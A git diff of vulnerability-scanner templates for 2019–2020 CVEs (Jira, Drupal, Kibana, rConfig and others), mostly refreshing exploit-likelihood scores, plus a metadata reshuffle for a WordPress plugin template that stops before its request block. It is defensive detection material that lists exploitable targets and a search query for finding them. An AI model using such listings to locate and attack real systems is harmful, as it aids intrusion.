b/http/cves/2019/CVE-2019-3402.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2019-3402 cwe-id: CWE-79 epss-score: 0.00254 - epss-percentile: 0.62993 + epss-percentile: 0.63152 cpe: cpe:2.3:a:atlassian:jira:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2019/CVE-2019-3403.yaml b/http/cves/2019/CVE-2019-3403.yaml index 5ff970c396..ff0cb47f16 100644 --- a/http/cves/2019/CVE-2019-3403.yaml +++ b/http/cves/2019/CVE-2019-3403.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2019-3403 cwe-id: CWE-863 epss-score: 0.0055 - epss-percentile: 0.74903 + epss-percentile: 0.7504 cpe: cpe:2.3:a:atlassian:jira:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-3799.yaml b/http/cves/2019/CVE-2019-3799.yaml index f7d213856a..6985850a40 100644 --- a/http/cves/2019/CVE-2019-3799.yaml +++ b/http/cves/2019/CVE-2019-3799.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.5 cve-id: CVE-2019-3799 cwe-id: CWE-22 - epss-score: 0.0285 - epss-percentile: 0.89604 + epss-score: 0.02349 + epss-percentile: 0.88672 cpe: cpe:2.3:a:vmware:spring_cloud_config:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-3911.yaml b/http/cves/2019/CVE-2019-3911.yaml index d3f0aaa6e1..2fe7af974e 100644 --- a/http/cves/2019/CVE-2019-3911.yaml +++ b/http/cves/2019/CVE-2019-3911.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2019-3911 cwe-id: CWE-79 epss-score: 0.00195 - epss-percentile: 0.57207 + epss-percentile: 0.57378 cpe: cpe:2.3:a:labkey:labkey_server:*:*:community:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-3912.yaml b/http/cves/2019/CVE-2019-3912.yaml index 6051fc2d0f..d9665bbc70 100644 --- a/http/cves/2019/CVE-2019-3912.yaml +++ b/http/cves/2019/CVE-2019-3912.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2019-3912 cwe-id: CWE-601 epss-score: 0.0016 - epss-percentile: 0.52361 + epss-percentile: 0.52431 cpe: cpe:2.3:a:labkey:labkey_server:*:*:*:*:community:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-3929.yaml b/http/cves/2019/CVE-2019-3929.yaml index 2539d10f01..b856b6309c 100644 --- a/http/cves/2019/CVE-2019-3929.yaml +++ b/http/cves/2019/CVE-2019-3929.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2019-3929 cwe-id: CWE-78,CWE-79 epss-score: 0.97378 - epss-percentile: 0.99892 + epss-percentile: 0.99896 cpe: cpe:2.3:o:crestron:am-100_firmware:1.6.0.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-5127.yaml b/http/cves/2019/CVE-2019-5127.yaml index d27fa70de9..e1472cbc42 100644 --- a/http/cves/2019/CVE-2019-5127.yaml +++ b/http/cves/2019/CVE-2019-5127.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2019-5127 cwe-id: CWE-78 epss-score: 0.97433 - epss-percentile: 0.99934 + epss-percentile: 0.99938 cpe: cpe:2.3:a:youphptube:youphptube_encoder:2.3:*:*:*:*:*:*:* metadata: max-request: 4 diff --git a/http/cves/2019/CVE-2019-5418.yaml b/http/cves/2019/CVE-2019-5418.yaml index 2486910599..3b04523ee2 100644 --- a/http/cves/2019/CVE-2019-5418.yaml +++ b/http/cves/2019/CVE-2019-5418.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2019-5418 cwe-id: CWE-22,NVD-CWE-noinfo epss-score: 0.97482 - epss-percentile: 0.99965 + epss-percentile: 0.99964 cpe: cpe:2.3:a:rubyonrails:rails:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-5434.yaml b/http/cves/2019/CVE-2019-5434.yaml index eead723ef8..3bcfb471be 100644 --- a/http/cves/2019/CVE-2019-5434.yaml +++ b/http/cves/2019/CVE-2019-5434.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2019-5434 cwe-id: CWE-502 - epss-score: 0.28703 - epss-percentile: 0.96397 + epss-score: 0.345 + epss-percentile: 0.96715 cpe: cpe:2.3:a:revive-sas:revive_adserver:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2019/CVE-2019-6112.yaml b/http/cves/2019/CVE-2019-6112.yaml index 26cd563699..a8d242368b 100644 --- a/http/cves/2019/CVE-2019-6112.yaml +++ b/http/cves/2019/CVE-2019-6112.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2019-6112 cwe-id: CWE-79 epss-score: 0.00126 - epss-percentile: 0.46868 + epss-percentile: 0.46982 cpe: cpe:2.3:a:graphpaperpress:sell_media:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-6340.yaml b/http/cves/2019/CVE-2019-6340.yaml index 23898ef4ca..d9b9ecf018 100644 --- a/http/cves/2019/CVE-2019-6340.yaml +++ b/http/cves/2019/CVE-2019-6340.yaml @@ -19,8 +19,8 @@ info: cvss-score: 8.1 cve-id: CVE-2019-6340 cwe-id: CWE-502 - epss-score: 0.97504 - epss-percentile: 0.99978 + epss-score: 0.97503 + epss-percentile: 0.9998 cpe: cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-6715.yaml b/http/cves/2019/CVE-2019-6715.yaml index c841ec4d2a..5e82d0076a 100644 --- a/http/cves/2019/CVE-2019-6715.yaml +++ b/http/cves/2019/CVE-2019-6715.yaml @@ -19,7 +19,7 @@ info: cvss-score: 7.5 cve-id: CVE-2019-6715 epss-score: 0.23312 - epss-percentile: 0.96086 + epss-percentile: 0.96121 cpe: cpe:2.3:a:boldgrid:w3_total_cache:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-6799.yaml b/http/cves/2019/CVE-2019-6799.yaml index fc5ef89be7..1ae229a546 100644 --- a/http/cves/2019/CVE-2019-6799.yaml +++ b/http/cves/2019/CVE-2019-6799.yaml @@ -22,7 +22,7 @@ info: cvss-score: 5.9 cve-id: CVE-2019-6799 epss-score: 0.13969 - epss-percentile: 0.95119 + epss-percentile: 0.95141 cpe: cpe:2.3:a:phpmyadmin:phpmyadmin:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2019/CVE-2019-6802.yaml b/http/cves/2019/CVE-2019-6802.yaml index 9c6aa45ec2..9f512db44a 100644 --- a/http/cves/2019/CVE-2019-6802.yaml +++ b/http/cves/2019/CVE-2019-6802.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2019-6802 cwe-id: CWE-74 epss-score: 0.00113 - epss-percentile: 0.44511 + epss-percentile: 0.44613 cpe: cpe:2.3:a:python:pypiserver:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2019/CVE-2019-7192.yaml b/http/cves/2019/CVE-2019-7192.yaml index d6b0bbcb92..ab08d573ec 100644 --- a/http/cves/2019/CVE-2019-7192.yaml +++ b/http/cves/2019/CVE-2019-7192.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2019-7192 cwe-id: CWE-863 - epss-score: 0.96581 - epss-percentile: 0.99517 + epss-score: 0.96341 + epss-percentile: 0.99444 cpe: cpe:2.3:a:qnap:photo_station:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2019/CVE-2019-7219.yaml b/http/cves/2019/CVE-2019-7219.yaml index 223913b5c5..f827869ce7 100644 --- a/http/cves/2019/CVE-2019-7219.yaml +++ b/http/cves/2019/CVE-2019-7219.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2019-7219 cwe-id: CWE-79 epss-score: 0.00113 - epss-percentile: 0.44434 + epss-percentile: 0.44533 cpe: cpe:2.3:a:zarafa:webaccess:7.2.0-48204:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-7238.yaml b/http/cves/2019/CVE-2019-7238.yaml index bf14a4bb38..8b2e91bad6 100644 --- a/http/cves/2019/CVE-2019-7238.yaml +++ b/http/cves/2019/CVE-2019-7238.yaml @@ -17,8 +17,8 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2019-7238 - epss-score: 0.97422 - epss-percentile: 0.99922 + epss-score: 0.97372 + epss-percentile: 0.99892 cpe: cpe:2.3:a:sonatype:nexus:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-7254.yaml b/http/cves/2019/CVE-2019-7254.yaml index ad2a4b4cd4..fbf45588e6 100644 --- a/http/cves/2019/CVE-2019-7254.yaml +++ b/http/cves/2019/CVE-2019-7254.yaml @@ -20,8 +20,8 @@ info: cvss-score: 7.5 cve-id: CVE-2019-7254 cwe-id: CWE-22 - epss-score: 0.81146 - epss-percentile: 0.98032 + epss-score: 0.85262 + epss-percentile: 0.98263 cpe: cpe:2.3:o:nortekcontrol:linear_emerge_essential_firmware:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2019/CVE-2019-7255.yaml b/http/cves/2019/CVE-2019-7255.yaml index 118d50779e..58842a1594 100644 --- a/http/cves/2019/CVE-2019-7255.yaml +++ b/http/cves/2019/CVE-2019-7255.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2019-7255 cwe-id: CWE-79 epss-score: 0.01544 - epss-percentile: 0.85671 + epss-percentile: 0.85731 cpe: cpe:2.3:o:nortekcontrol:linear_emerge_essential_firmware:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2019/CVE-2019-7256.yaml b/http/cves/2019/CVE-2019-7256.yaml index 9267571d98..24967bfdb0 100644 --- a/http/cves/2019/CVE-2019-7256.yaml +++ b/http/cves/2019/CVE-2019-7256.yaml @@ -21,8 +21,8 @@ info: cvss-score: 10 cve-id: CVE-2019-7256 cwe-id: CWE-78 - epss-score: 0.97404 - epss-percentile: 0.9991 + epss-score: 0.97388 + epss-percentile: 0.99904 cpe: cpe:2.3:o:nortekcontrol:linear_emerge_essential_firmware:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2019/CVE-2019-7275.yaml b/http/cves/2019/CVE-2019-7275.yaml index dc37e9a27d..00791a86e9 100644 --- a/http/cves/2019/CVE-2019-7275.yaml +++ b/http/cves/2019/CVE-2019-7275.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2019-7275 cwe-id: CWE-601 epss-score: 0.00483 - epss-percentile: 0.73196 + epss-percentile: 0.73333 cpe: cpe:2.3:a:optergy:enterprise:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-7315.yaml b/http/cves/2019/CVE-2019-7315.yaml index 1043e24ebf..7cc4b787eb 100644 --- a/http/cves/2019/CVE-2019-7315.yaml +++ b/http/cves/2019/CVE-2019-7315.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.5 cve-id: CVE-2019-7315 cwe-id: CWE-22 - epss-score: 0.01945 - epss-percentile: 0.87366 + epss-score: 0.01501 + epss-percentile: 0.85524 cpe: cpe:2.3:o:genieaccess:wip3bvaf_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-7481.yaml b/http/cves/2019/CVE-2019-7481.yaml index 8ab0994c25..02ea8ec34b 100644 --- a/http/cves/2019/CVE-2019-7481.yaml +++ b/http/cves/2019/CVE-2019-7481.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.5 cve-id: CVE-2019-7481 cwe-id: CWE-89 - epss-score: 0.88397 - epss-percentile: 0.984 + epss-score: 0.87114 + epss-percentile: 0.98362 cpe: cpe:2.3:o:sonicwall:sma_100_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-7543.yaml b/http/cves/2019/CVE-2019-7543.yaml index fffd323f93..7d940ff3cb 100644 --- a/http/cves/2019/CVE-2019-7543.yaml +++ b/http/cves/2019/CVE-2019-7543.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2019-7543 cwe-id: CWE-79 epss-score: 0.00113 - epss-percentile: 0.44511 + epss-percentile: 0.44613 cpe: cpe:2.3:a:kindsoft:kindeditor:4.1.11:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2019/CVE-2019-7609.yaml b/http/cves/2019/CVE-2019-7609.yaml index aafa673393..6f19465076 100644 --- a/http/cves/2019/CVE-2019-7609.yaml +++ b/http/cves/2019/CVE-2019-7609.yaml @@ -20,8 +20,8 @@ info: cvss-score: 10 cve-id: CVE-2019-7609 cwe-id: CWE-94 - epss-score: 0.96365 - epss-percentile: 0.99434 + epss-score: 0.96098 + epss-percentile: 0.99371 cpe: cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-8086.yaml b/http/cves/2019/CVE-2019-8086.yaml index b3c27e800b..ba2ac9e153 100644 --- a/http/cves/2019/CVE-2019-8086.yaml +++ b/http/cves/2019/CVE-2019-8086.yaml @@ -20,8 +20,8 @@ info: cvss-score: 7.5 cve-id: CVE-2019-8086 cwe-id: CWE-611 - epss-score: 0.12383 - epss-percentile: 0.94862 + epss-score: 0.09189 + epss-percentile: 0.94079 cpe: cpe:2.3:a:adobe:experience_manager:6.2:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2019/CVE-2019-8390.yaml b/http/cves/2019/CVE-2019-8390.yaml index 23ed48683d..5b0aadbe7f 100644 --- a/http/cves/2019/CVE-2019-8390.yaml +++ b/http/cves/2019/CVE-2019-8390.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2019-8390 cwe-id: CWE-79 epss-score: 0.0161 - epss-percentile: 0.86028 + epss-percentile: 0.86055 cpe: cpe:2.3:a:qdpm:qdpm:9.1:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2019/CVE-2019-8442.yaml b/http/cves/2019/CVE-2019-8442.yaml index e9348f38c9..b5f2915847 100644 --- a/http/cves/2019/CVE-2019-8442.yaml +++ b/http/cves/2019/CVE-2019-8442.yaml @@ -17,7 +17,7 @@ info: cvss-score: 7.5 cve-id: CVE-2019-8442 epss-score: 0.97131 - epss-percentile: 0.99744 + epss-percentile: 0.99752 cpe: cpe:2.3:a:atlassian:jira:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2019/CVE-2019-8446.yaml b/http/cves/2019/CVE-2019-8446.yaml index 537b611345..98a8f5a8a2 100644 --- a/http/cves/2019/CVE-2019-8446.yaml +++ b/http/cves/2019/CVE-2019-8446.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2019-8446 cwe-id: CWE-863 epss-score: 0.15691 - epss-percentile: 0.95381 + epss-percentile: 0.95403 cpe: cpe:2.3:a:atlassian:jira_server:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-8449.yaml b/http/cves/2019/CVE-2019-8449.yaml index 999265ae02..295fa1f641 100644 --- a/http/cves/2019/CVE-2019-8449.yaml +++ b/http/cves/2019/CVE-2019-8449.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2019-8449 cwe-id: CWE-306 epss-score: 0.24444 - epss-percentile: 0.96164 + epss-percentile: 0.96191 cpe: cpe:2.3:a:atlassian:jira:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-8451.yaml b/http/cves/2019/CVE-2019-8451.yaml index 1359fa24b8..7504a8472a 100644 --- a/http/cves/2019/CVE-2019-8451.yaml +++ b/http/cves/2019/CVE-2019-8451.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2019-8451 cwe-id: CWE-918 epss-score: 0.97115 - epss-percentile: 0.99734 + epss-percentile: 0.99743 cpe: cpe:2.3:a:atlassian:jira_server:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-8903.yaml b/http/cves/2019/CVE-2019-8903.yaml index e70a27a5a3..84c49e0b96 100644 --- a/http/cves/2019/CVE-2019-8903.yaml +++ b/http/cves/2019/CVE-2019-8903.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2019-8903 cwe-id: CWE-22 epss-score: 0.01071 - epss-percentile: 0.8251 + epss-percentile: 0.82603 cpe: cpe:2.3:a:totaljs:total.js:*:*:*:*:*:node.js:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-8937.yaml b/http/cves/2019/CVE-2019-8937.yaml index 367d39182b..a71c919107 100644 --- a/http/cves/2019/CVE-2019-8937.yaml +++ b/http/cves/2019/CVE-2019-8937.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2019-8937 cwe-id: CWE-79 epss-score: 0.00921 - epss-percentile: 0.8108 + epss-percentile: 0.81156 cpe: cpe:2.3:a:digitaldruid:hoteldruid:2.3.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2019/CVE-2019-8982.yaml b/http/cves/2019/CVE-2019-8982.yaml index 7b3f257754..4914f33ac0 100644 --- a/http/cves/2019/CVE-2019-8982.yaml +++ b/http/cves/2019/CVE-2019-8982.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.6 cve-id: CVE-2019-8982 cwe-id: CWE-918 - epss-score: 0.02146 - epss-percentile: 0.8807 + epss-score: 0.02482 + epss-percentile: 0.88975 cpe: cpe:2.3:a:wavemaker:wavemarker_studio:6.6:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-9041.yaml b/http/cves/2019/CVE-2019-9041.yaml index 37fde5feab..eea0673524 100644 --- a/http/cves/2019/CVE-2019-9041.yaml +++ b/http/cves/2019/CVE-2019-9041.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.2 cve-id: CVE-2019-9041 cwe-id: CWE-917 - epss-score: 0.01127 - epss-percentile: 0.84894 + epss-score: 0.01396 + epss-percentile: 0.84978 cpe: cpe:2.3:a:zzzcms:zzzphp:1.6.1:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2019/CVE-2019-9618.yaml b/http/cves/2019/CVE-2019-9618.yaml index c7e174c99b..419dd929dc 100644 --- a/http/cves/2019/CVE-2019-9618.yaml +++ b/http/cves/2019/CVE-2019-9618.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2019-9618 cwe-id: CWE-22 - epss-score: 0.0643 - epss-percentile: 0.92936 + epss-score: 0.05313 + epss-percentile: 0.92311 cpe: cpe:2.3:a:gracemedia_media_player_project:gracemedia_media_player:1.0:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-9670.yaml b/http/cves/2019/CVE-2019-9670.yaml index 8cb09c6b95..eceb5ed8f2 100644 --- a/http/cves/2019/CVE-2019-9670.yaml +++ b/http/cves/2019/CVE-2019-9670.yaml @@ -23,7 +23,7 @@ info: cve-id: CVE-2019-9670 cwe-id: CWE-611 epss-score: 0.97216 - epss-percentile: 0.99791 + epss-percentile: 0.99797 cpe: cpe:2.3:a:synacor:zimbra_collaboration_suite:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-9726.yaml b/http/cves/2019/CVE-2019-9726.yaml index a338f72c45..c08613aa38 100644 --- a/http/cves/2019/CVE-2019-9726.yaml +++ b/http/cves/2019/CVE-2019-9726.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2019-9726 cwe-id: CWE-22 epss-score: 0.03616 - epss-percentile: 0.9067 + epss-percentile: 0.90739 cpe: cpe:2.3:o:eq-3:ccu3_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-9733.yaml b/http/cves/2019/CVE-2019-9733.yaml index e19202b6ed..b623f358e8 100644 --- a/http/cves/2019/CVE-2019-9733.yaml +++ b/http/cves/2019/CVE-2019-9733.yaml @@ -19,7 +19,7 @@ info: cvss-score: 9.8 cve-id: CVE-2019-9733 epss-score: 0.88323 - epss-percentile: 0.98395 + epss-percentile: 0.9843 cpe: cpe:2.3:a:jfrog:artifactory:6.7.3:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-9915.yaml b/http/cves/2019/CVE-2019-9915.yaml index b8178280f3..2daab16225 100644 --- a/http/cves/2019/CVE-2019-9915.yaml +++ b/http/cves/2019/CVE-2019-9915.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2019-9915 cwe-id: CWE-601 epss-score: 0.00123 - epss-percentile: 0.46313 + epss-percentile: 0.46435 cpe: cpe:2.3:a:get-simple.:getsimplecms:3.3.13:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2019/CVE-2019-9922.yaml b/http/cves/2019/CVE-2019-9922.yaml index d1ea575d6e..1990d8ecb3 100644 --- a/http/cves/2019/CVE-2019-9922.yaml +++ b/http/cves/2019/CVE-2019-9922.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2019-9922 cwe-id: CWE-22 epss-score: 0.01171 - epss-percentile: 0.8334 + epss-percentile: 0.83428 cpe: cpe:2.3:a:harmistechnology:je_messenger:1.2.2:*:*:*:*:joomla\!:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-9955.yaml b/http/cves/2019/CVE-2019-9955.yaml index 6c2fc36800..1ecafd46f9 100644 --- a/http/cves/2019/CVE-2019-9955.yaml +++ b/http/cves/2019/CVE-2019-9955.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2019-9955 cwe-id: CWE-79 epss-score: 0.0798 - epss-percentile: 0.93611 + epss-percentile: 0.93652 cpe: cpe:2.3:o:zyxel:atp200_firmware:4.31:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-9978.yaml b/http/cves/2019/CVE-2019-9978.yaml index ee131bd600..9977beeb1e 100644 --- a/http/cves/2019/CVE-2019-9978.yaml +++ b/http/cves/2019/CVE-2019-9978.yaml @@ -5,34 +5,30 @@ info: author: madrobot,dwisiswant0 severity: medium description: WordPress Social Warfare plugin before 3.5.3 contains a cross-site scripting vulnerability via the wp-admin/admin-post.php?swp_debug=load_options swp_url parameter, affecting Social Warfare and Social Warfare Pro. - impact: | - Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, leading to potential data theft, session hijacking, or defacement. - remediation: | - Update the Social Warfare plugin to version 3.5.3 or later to mitigate the vulnerability. reference: - https://github.com/mpgn/CVE-2019-9978 - https://www.wordfence.com/blog/2019/03/unpatched-zero-day-vulnerability-in-social-warfare-plugin-exploited-in-the-wild/ - https://www.pluginvulnerabilities.com/2019/03/21/full-disclosure-of-settings-change-persistent-cross-site-scripting-xss-vulnerability-in-social-warfare/ - https://www.cybersecurity-help.cz/vdb/SB2019032105 - https://nvd.nist.gov/vuln/detail/CVE-2019-9978 + remediation: | + Update the Social Warfare plugin to version 3.5.3 or later to mitigate the vulnerability. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2019-9978 cwe-id: CWE-79 + cpe: cpe:2.3:a:warfareplugins:social_warfare:*:*:*:*:*:wordpress:*:* epss-score: 0.97323 epss-percentile: 0.99859 - cpe: cpe:2.3:a:warfareplugins:social_warfare:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 - vendor: warfareplugins - product: social_warfare - framework: wordpress fofa-query: body="social-warfare" && body="wp-" + framework: wordpress + max-request: 2 + product: social_warfare + vendor: warfareplugins tags: cve,cve2019,wordpress,wp-plugin,ssrf,kev,warfareplugins -flow: http(1) && http(2) - http: - raw: - | diff --git a/http/cves/2020/CVE-2020-0618.yaml b/http/cves/2020/CVE-2020-0618.yaml index 98f40f0ed5..abb760480f 100644 --- a/http/cves/2020/CVE-2020-0618.yaml +++ b/http/cves/2020/CVE-2020-0618.yaml @@ -20,8 +20,8 @@ info: cvss-score: 8.8 cve-id: CVE-2020-0618 cwe-id: CWE-502 - epss-score: 0.97407 - epss-percentile: 0.99911 + epss-score: 0.97439 + epss-percentile: 0.99944 cpe: cpe:2.3:a:microsoft:sql_server:2012:sp4:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-10148.yaml b/http/cves/2020/CVE-2020-10148.yaml index 271fb23d30..b785746302 100644 --- a/http/cves/2020/CVE-2020-10148.yaml +++ b/http/cves/2020/CVE-2020-10148.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2020-10148 cwe-id: CWE-287,CWE-288 epss-score: 0.97324 - epss-percentile: 0.9986 + epss-percentile: 0.99864 cpe: cpe:2.3:a:solarwinds:orion_platform:2019.4:hotfix5:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2020/CVE-2020-10199.yaml b/http/cves/2020/CVE-2020-10199.yaml index dd7047555f..869fcdd973 100644 --- a/http/cves/2020/CVE-2020-10199.yaml +++ b/http/cves/2020/CVE-2020-10199.yaml @@ -20,8 +20,8 @@ info: cvss-score: 8.8 cve-id: CVE-2020-10199 cwe-id: CWE-917 - epss-score: 0.97374 - epss-percentile: 0.99889 + epss-score: 0.97392 + epss-percentile: 0.99907 cpe: cpe:2.3:a:sonatype:nexus:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2020/CVE-2020-10220.yaml b/http/cves/2020/CVE-2020-10220.yaml index 58aa6fac33..daa405a67e 100644 --- a/http/cves/2020/CVE-2020-10220.yaml +++ b/http/cves/2020/CVE-2020-10220.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2020-10220 cwe-id: CWE-89 epss-score: 0.02204 - epss-percentile: 0.88245 + epss-percentile: 0.88293 cpe: cpe:2.3:a:rconfig:rconfig:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-10546.yaml b/http/cves/2020/CVE-2020-10546.yaml index c8307a8564..050819a0d9 100644 --- a/http/cves/2020/CVE-2020-10546.yaml +++ b/http/cves/2020/CVE-2020-10546.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2020-10546 cwe-id: CWE-89 epss-score: 0.45422 - epss-percentile: 0.97061 + epss-percentile: 0.97076 cpe: cpe:2.3:a:rconfig:rconfig:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-10547.yaml b/http/cves/2020/CVE-2020-10547.yaml index ac1d58ade1..53666ebba1 100644 --- a/http/cves/2020/CVE-2020-10547.yaml +++ b/http/cves/2020/CVE-2020-10547.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2020-10547 cwe-id: CWE-89 epss-score: 0.45422 - epss-percentile: 0.97061 + epss-percentile: 0.97076 cpe: cpe:2.3:a:rconfig:rconfig:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-10548.yaml b/http/cves/2020/CVE-2020-10548.yaml index 25035bf4e0..0f20d2b401 100644 --- a/http/cves/2020/CVE-2020-10548.yaml +++ b/http/cves/2020/CVE-2020-10548.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2020-10548 cwe-id: CWE-89 epss-score: 0.45422 - epss-percentile: 0.97061 + epss-percentile: 0.97076 cpe: cpe:2.3:a:rconfig:rconfig:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-10549.yaml b/http/cves/2020/CVE-2020-10549.yaml index ecbfdaac96..1732e0f9f4 100644 --- a/http/cves/2020/CVE-2020-10549.yaml +++ b/http/cves/2020/CVE-2020-10549.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2020-10549 cwe-id: CWE-89 epss-score: 0.45422 - epss-percentile: 0.97061 + epss-percentile: 0.97076 cpe: cpe:2.3:a:rconfig:rconfig:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-10770.yaml b/http/cves/2020/CVE-2020-10770.yaml index e72d83a571..1be3313270 100644 --- a/http/cves/2020/CVE-2020-10770.yaml +++ b/http/cves/2020/CVE-2020-10770.yaml @@ -19,8 +19,8 @@ info: cvss-score: 5.3 cve-id: CVE-2020-10770 cwe-id: CWE-918 - epss-score: 0.3813 - epss-percentile: 0.9685 + epss-score: 0.3389 + epss-percentile: 0.96671 cpe: cpe:2.3:a:redhat:keycloak:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-10973.yaml b/http/cves/2020/CVE-2020-10973.yaml index c5b08d6ff6..2c545bd9e5 100644 --- a/http/cves/2020/CVE-2020-10973.yaml +++ b/http/cves/2020/CVE-2020-10973.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2020-10973 cwe-id: CWE-306 epss-score: 0.04225 - epss-percentile: 0.91308 + epss-percentile: 0.91375 cpe: cpe:2.3:o:wavlink:wn530hg4_firmware:m30hg4.v5030.191116:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-11034.yaml b/http/cves/2020/CVE-2020-11034.yaml index ec3f0075b8..cf47584068 100644 --- a/http/cves/2020/CVE-2020-11034.yaml +++ b/http/cves/2020/CVE-2020-11034.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2020-11034 cwe-id: CWE-601,CWE-185 epss-score: 0.00381 - epss-percentile: 0.69966 + epss-percentile: 0.70139 cpe: cpe:2.3:a:glpi-project:glpi:*:*:*:*:*:*:*:* 